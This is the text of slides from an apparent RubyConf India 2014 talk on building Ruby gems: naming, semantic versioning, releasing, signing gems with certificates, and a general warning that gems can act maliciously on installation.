Build, Debug and Prosper – (in an around 25 minutes ..!!) – Statistics:

View Github Repository Open presentation in a new window

rishijain

See all presentation from rishijain

Build, Debug and Prosper – (in an around 25 minutes ..!!) – Statistics:

0 0

rubyconfindia14

Slides of talk given at RubyConf, India-14

On Github rishijain / rubyconfindia14

Build, Debug and Prosper

(in an around 25 minutes ..!!)

Build something, Debug Something, Prosper Something .. Something?

GEMS

Statistics:

0.57 Gem/Rubyist

Downloaded from:   http://www.ideachampions.com/weblogs/WHY.jpg

Possible Reasons:

1. Complicated

(Downloaded from: http://static4.cad-notes.com/wp-content/uploads/2013/02/complicated-drawing.jpg)

2. Calibre

(Downloaded from: http://www.sharpbrains.com/wp-content/uploads/2006/12/BrainLightBulb.jpg)

3. Busy

(Downloaded from: http://dreallday.com/wp-content/uploads/2012/07/475px-Busy_desk.svg_.png)

4. Lazy

(Downloaded from: http://images.smh.com.au/2011/05/06/2346892/729lazy-420x0.jpg)

5. Trivial

(Downloaded from: http://art.ngfiles.com./images/1/blackmarketkraig_useless-boy-v2-0.jpg)

Agenda:

Build a ruby gem

Security issues

Write native extension(if time permits)

Building a ruby gem

Let's build.

Wait.. but what?

Steps:

Name

Code

Release

naming conventions

Underscores for multiple words

Dash when extending

  ------------------    -------------------------     ------------------------
  |      gem name  |    |   Module/Class name   |    |   Require statement   |
  ------------------    -------------------------     ------------------------
           |                        |                             |
 -----------------------   ------------------        ---------------------------
 |    hello_world      |   |  HelloWorld    |        |  require 'hello_world'  | 
 -----------------------   ------------------        ---------------------------
          |                        |                             |
 -----------------------   -------------------       -----------------------------
 | rails-hello_world   |   |Rails::HelloWorld|       |require 'rails/hello_world'|  
 -----------------------   -------------------       -----------------------------

Gemname availability

rubygems.org

Command Line

gem query --remote rails
gem query --remote --name-matches '^rails$'

code

VERSIONING

Scenario:

VERSION 1: Initial class is released

VERSION 2: More features added to class

VERSION 3: Bug fixes in existing methods

VERSION 4: Changes which break earlier code

Semantic Versioning:

x.y.z

Patch: 0.0.x

Minor: 0.x.0

Major: x.0.0

Semantic Versioning:

VERSION 0.0.1 : Initial class is released

VERSION 0.1.0 : More features added to class

VERSION 0.1.1 : Bug fixes in existing methods

VERSION 1.0.0 : Changes which break earlier code

~>
gem 'rails', '~> 3.0.3'
gem 'thin',  '~> 1.1'

Semantic Versioning:

1. Optimistic Way

1. Pessimistic Way

Optimistic Versioning

gem 'your_gem_name', '>= 0.1.0'

Pessimistic Versioning

gem 'your_gem_name', '>= 0.1.0', '< 1.0'

Releasing gem

gem push gemname-0.0.1.gem

30 JAN

30 JAN, 2013

Rubygems got hacked !!!

After effects:

1.) Signing ruby gems.

2.) App-store type model.

3.) Ask developers to pay for certificates.

Signing gems

Build a public certificate and a private pem files.

How to sign gems?

Step 1: Create certificates

$ gem cert --build you@example.com

Public Cert: gem-public_cert.pem

Private Key: gem-private_key.pem

Step 2: Update gemspec files

cd /path/to/your/gem
mkdir certs
cp ~/.ssh/gem-public_cert.pem certs/yourhandle.pem
git add certs/yourhandle.pem

s.cert_chain  = ['certs/yourhandle.pem']
s.signing_key = File.expand_path("~/.ssh/gem-private_key.pem")

Step 3: Certificate List

gem cert --add certs/yourhandle.pem

Step 4: Build Gem

gem build gemname.gemspec

gem install gemname-version.gem -P HighSecurity

gem   install   gemname   -P   HighSecurity

Security Policies

1.) No Security: Well, no security at all. Signed packages are treated like unsigned packages.

2.) Low Security:Expiry of certificate

3.) Medium Security: Validation of certificate + Certificate chains

4.) High Security: Medium Security + un-signed gems restriction

Problem with signing ruby gems?

Not scalable as number of gems to install increase.

Chain of Certificates

                    --------------------------
                    | rubygems@rubygems.org |
                    --------------------------
                                |
              -----------------------------------
              |                                 |
  ----------------------------    -----------------------------
  |         Varis            |    |         Joffrey            |
  ----------------------------    -----------------------------
       |                |                 |             |
---------------   ----------------   -----------   --------------
|  Ned Stark  |   |     Tyron    |   | Khaleesi |  |     Rob    |
---------------   ----------------   -----------   --------------

How signing helps?

Lets consider a hypothetical scenario:

1. You have a problem.

2. Solution found on stack-overflow (some gem )

3. gem install gem_name

vulnerability on gem installation

1. Read/Write files.

2. Connect to remote server.

3. Grab passwords

4. Own all your rubygems

and a lot more is possible.

@benjamin_smith

Dont install Ben's gems.

1.) awesome_rails_flash_messages

2.) better_date_to_s

3.) be_truthy

gem fetch gemname


gem unpack gemname-0.0.1.gem

Take Away: Dont trust gems blindly !!

Thank You.